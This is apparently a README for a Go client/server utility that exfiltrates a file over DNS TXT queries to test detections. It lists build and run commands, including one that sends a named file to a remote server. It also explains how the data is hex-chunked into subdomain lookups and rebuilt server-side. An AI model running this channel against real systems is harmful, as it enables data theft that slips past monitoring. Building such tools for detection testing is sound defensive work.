Simple client/server in golang to help with testing data exfil detections over DNS TXT records. Note: this utility is intended for detections testing rather than for use in red team operations, as this does not contain opsec controls (uses simple hex encoding).
On Server Host:
-
-
cd dns-TXT-exfil-test/server
-
go get github.com/miekg/dns
-
go build
-
./server
On Client Host:
-
-
cd dns-TXT-exfil-test/client
-
sed -i -e 's|10.10.10.10|IP_OF_YOUR_SERVER_HOST|g' client.go
-
go build
-
./client [path_to_file_to_exfil]
From a detections perspective, this is how this tool works:
-
The client takes the file, breaks it into 50 character hex encoded chunks
-
The client then takes each 50 character chunk and sends it in a DNS TXT record request as follows:
[hex_file_data].macconsultants.com, TYPE: TXT, CLASS IN
-
The server takes each 50 character hex encoded chunk, unhexlifies it, and writes it to a file in the current directory named "outfile"
-
The server also sends a TXT answer to that query as follows:
[hex_file_data].macconsultants.com, TYPE TXT, CLASS IN
This can be a helpful way to validate any detections around suspicious DNS TXT traffic
Note: This tool gets all but the last 4-5 bytes of a the sent file, due to how I perform the parsing on the server side. However, this is still sufficient for testing exfil over TXT records